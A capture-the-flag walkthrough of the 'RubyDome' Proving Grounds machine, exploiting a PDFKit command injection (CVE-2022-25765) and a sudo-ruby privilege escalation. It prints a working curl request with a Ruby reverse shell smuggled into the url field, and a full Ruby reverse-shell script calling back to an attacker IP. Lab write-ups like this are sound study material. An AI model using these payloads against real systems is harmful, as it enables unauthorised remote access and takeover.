RubyDome - Proving Grounds Practice

Enumeration

Nmap

Initial nmap scan revealed SSH and port 3000 were open.

00 - nmap

Web Enumeartion

Website had singular input point where it converts a page from URL to a pdf.

01 - website

However, entering random values revealed that page was using PDFKit to do this operation.

02 - pdf

Exploitation

CVE-2022-25765

The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.

Some research revealed that we could exploit this to obtain remote command execution. I found a github repo named shamo0/PDFkit-CMD-Injection which explains this exploitation in detail.

03 - exploit for pdfkit

All I needed to is run below commands on different terminals to get a reverse shell.

## first terminal
python3 -m http.server 80

## second terminal
sudo rlwrap nc -nlvp 4444

## third terminal (update IP and PORT values)
curl 'http://192.168.157.22:3000' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://192.168.157.22:3000' -H 'Connection: keep-alive' -H 'Referer: http://192.168.157.22:3000' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2192.168.45.220%3A80%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22192.168.45.220%22%2C4444%29%29%27%60'

06 - exploiting

And by running the last command, I got the user shell.

07 - local flag

Privilege Escalation

sudo NOPASSWD ruby over writable rb file

sudo -lcommand revealed that user had NOPASSWD ruby privileges over an app.rb file which we had write access.

08 - sudo -l

At first I created a malicious app.rb file as seen below.

#!/usr/bin/env ruby
# syscall 33 = dup2 on 64-bit Linux
# syscall 63 = dup2 on 32-bit Linux
# test with nc -lvp 1337 

require 'socket'

s = Socket.new 2,1
s.connect Socket.sockaddr_in 1337, '192.168.45.220'

[0,1,2].each { |fd| syscall 33, s.fileno, fd }
exec '/bin/sh -i'

Then transfered it to target machine.

10 - transfered

And executing it got me root shell.

11 - executed it

12 - gg

Press - Proving Grounds Practice

Scrutiny - Proving Grounds Practice